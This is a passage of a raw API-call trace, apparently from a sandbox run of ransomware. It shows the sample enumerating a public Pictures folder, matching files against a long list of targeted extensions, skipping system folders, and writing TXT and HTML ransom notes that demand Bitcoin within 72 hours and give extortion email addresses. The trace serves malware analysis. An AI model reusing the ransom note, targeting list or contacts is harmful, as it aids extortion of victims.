	[0180.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.841] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="programdata") returned 0x0
	[0180.841] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8539432d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.841] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.841] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.841] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.841] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\"
	[0180.841] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Pictures\\desktop.ini") returned="C:\\Users\\Public\\Pictures\\desktop.ini"
	[0180.842] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36
	[0180.842] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.842] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Pictures\\desktop.ini", cchLength=0x24 | out: lpsz="c:\\users\\public\\pictures\\desktop.ini") returned 0x24
	[0180.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.842] StrStrW (lpFirst="c:\\users\\public\\pictures\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.842] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\pictures\\desktop.ini" | out: lpString1="c:\\users\\public\\pictures\\desktop.ini") returned="c:\\users\\public\\pictures\\desktop.ini"
	[0180.842] lstrlenW (lpString="c:\\users\\public\\pictures\\desktop.ini") returned 36
	[0180.843] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.843] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.843] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0180.844] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8539432d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8539432d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8539432d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.844] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0180.844] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0180.844] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\"
	[0180.846] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0180.846] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 53
	[0180.846] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.846] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x35 | out: lpsz="c:\\users\\public\\pictures\\help_decrypt_your_files.html") returned 0x35
	[0180.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.846] StrStrW (lpFirst="c:\\users\\public\\pictures\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0180.846] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8536e2dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8536e2dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8539432d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.847] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0180.847] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0180.847] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\"
	[0180.847] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0180.847] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 52
	[0180.847] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.847] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x34 | out: lpsz="c:\\users\\public\\pictures\\help_decrypt_your_files.txt") returned 0x34
	[0180.847] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.847] StrStrW (lpFirst="c:\\users\\public\\pictures\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0180.847] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8536e2dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8536e2dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8539432d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.848] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0180.848] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0180.848] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures"
	[0180.848] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\*.*"
	[0180.848] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.849] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.849] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 52
	[0180.849] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.851] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.851] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.853] CloseHandle (hObject=0x380) returned 1
	[0180.853] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.854] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.855] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.855] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.855] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.855] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.855] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.856] CloseHandle (hObject=0x380) returned 1
	[0180.856] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.856] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.856] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.856] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 53
	[0180.856] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.858] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.859] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.861] CloseHandle (hObject=0x380) returned 1
	[0180.861] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.861] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.862] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.862] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.863] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.863] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.863] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.863] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.864] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.864] CloseHandle (hObject=0x380) returned 1
	[0180.864] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*" (normalized: "c:\\users\\public\\pictures\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x8539432d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8539432d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0180.864] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\*.*") returned 28
	[0180.865] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.865] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Pictures\\*.*", cchLength=0x1c | out: lpsz="c:\\users\\public\\pictures\\*.*") returned 0x1c
	[0180.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.865] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="windows") returned 0x0
	[0180.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.865] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="boot") returned 0x0
	[0180.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.866] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0180.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.866] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.866] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="temp") returned 0x0
	[0180.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.867] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="program files") returned 0x0
	[0180.867] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.867] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.867] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.867] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="appdata") returned 0x0
	[0180.867] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
